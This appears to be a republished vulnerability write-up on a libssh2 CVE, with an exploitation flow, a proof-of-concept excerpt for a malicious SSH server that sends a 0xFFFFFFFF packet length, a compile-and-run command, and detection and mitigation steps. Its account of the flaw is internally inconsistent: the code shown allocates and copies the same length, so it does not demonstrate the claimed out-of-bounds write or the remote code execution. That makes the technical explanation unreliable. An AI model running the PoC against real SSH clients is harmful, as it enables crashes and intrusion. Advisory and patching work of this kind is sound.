CVE-2026-55200: In-Depth Analysis and PoC of libssh2 Pre-Authentication RCE
The article details CVE-2026-55200, a critical out-of-bounds write in libssh2 that enables unauthenticated remote code execution, explains the underlying flaw, shows a full PoC, outlines the extensive supply‑chain impact, and provides detection commands and mitigation steps.
Vulnerability Overview
libssh2 contains a critical out‑of‑bounds heap write (CVE‑2026‑55200) with a CVSS score of 9.2. The flaw is triggered during SSH transport packet handling, requires no authentication or user interaction, and can lead to remote code execution.
CVE : CVE-2026-55200
Severity : 9.2 Critical
Type : Out‑of‑Bounds Write (heap)
Affected versions : ≤ 1.11.1
Attack vector : Network
Privileges required : None
User interaction : None
Complexity : Low
Fix commit :
97acf3dfda80c91c3a8c9f2372546301d4a1a7a8Vulnerability Mechanism
The function ssh2_transport_read() reads the incoming packet length and uses it directly for heap allocation without validation.
packet_length = read_packet_length();
buffer = malloc(packet_length);
memcpy(buffer, incoming_data, packet_length);An attacker can set packet_length = 0xFFFFFFFF (≈4 GB). libssh2 attempts to allocate this size and copies data into the buffer, corrupting the heap.
Exploitation Flow
Attacker
│
▼
Deploy malicious SSH server (default port 1337)
│
▼
Victim SSH client connects (e.g., libcurl, Git)
│
▼
Server sends SSH banner + forged SSH_MSG_KEXINIT
│
▼
Client processes KEXINIT and receives malicious packet
│
▼
malloc(packet_length = 0xFFFFFFFF) → heap corruption
│
┌───┐
▼ ▼
DoS Potential RCESupply‑Chain Impact
libssh2 is statically linked by many mainstream projects and devices, including curl, Git, PHP, backup software, file‑transfer applications, SSH clients, automation frameworks, CI/CD platforms, infrastructure orchestration tools, network‑device firmware, Linux embedded systems, and IoT devices. The vulnerability therefore affects a wide range of software beyond libssh2 itself.
Note: OpenSSH is not affected because it does not use libssh2.
Proof‑of‑Concept
PoC source: https://github.com/xd20111/CVE-2026-55200. The PoC implements a malicious SSH server that sends a forged SSH_MSG_KEXINIT followed by a packet with length 0xFFFFFFFF.
#define SSH_BANNER "SSH-Research / Educational use ONLY
"
#define MALICIOUS_PACKET_LENGTH 0xFFFFFFFFU
// 1. Send SSH banner
send(client_sock, SSH_BANNER, strlen(SSH_BANNER), 0);
// 2. Receive client banner
recv(client_sock, buffer, sizeof(buffer)-1, 0);
// 3. Send forged SSH_MSG_KEXINIT
unsigned char kexinit[] = { 0x00, 0x00, 0x00, 0x10, 0x14, /* ... */ };
send(client_sock, kexinit, sizeof(kexinit), 0);
// 4. Send malicious packet
unsigned char malicious[1024] = {0};
uint32_t pkt_len = MALICIOUS_PACKET_LENGTH; // 0xFFFFFFFF = 4 GB
unsigned char pad_len = 8;
memcpy(malicious, &pkt_len, 4);
malicious[4] = pad_len;
memset(malicious + 5, 0x41, 700); // fill 700 bytes with 'A'
size_t total = 5 + 700 + pad_len;
send(client_sock, malicious, total, 0);Compile and run:
gcc CVE-2026-55200.c -o exploit -lpthread && ./exploit [port]Detection Methods
# Check libssh2 version
pkg-config --modversion libssh2
# Debian/Ubuntu
dpkg -l | grep libssh2
apt-cache policy libssh2-1
# RHEL/AlmaLinux
rpm -qa | grep libssh2
dnf info libssh2
# Find executables linked with libssh2
ldconfig -p | grep libssh2
find /usr -type f -executable -exec ldd {} \; 2>/dev/null | grep libssh2
# Check if curl is statically linked with libssh2
curl --version | grep libssh2Mitigation
Upgrade (recommended)
# Debian/Ubuntu
sudo apt update && sudo apt upgrade libssh2-1 && sudo reboot
# RHEL/AlmaLinux
sudo dnf update libssh2 && sudo reboot
# Fedora
sudo dnf upgrade --refresh libssh2 && sudo rebootRestrict SSH Exposure
sudo ufw allow from TRUSTED_IP to any port 22
sudo ufw deny 22Compiler Hardening
-fstack-protector-strong -D_FORTIFY_SOURCE=2 -fPIE -pie -Wl,-z,relro,-z,nowReferences
PoC: https://github.com/xd20111/CVE-2026-55200
NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2026-55200
libssh2 project: https://libssh2.org
Fix commit: https://github.com/libssh2/libssh2/commit/97acf3dfda80c91c3a8c9f2372546301d4a1a7a8
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
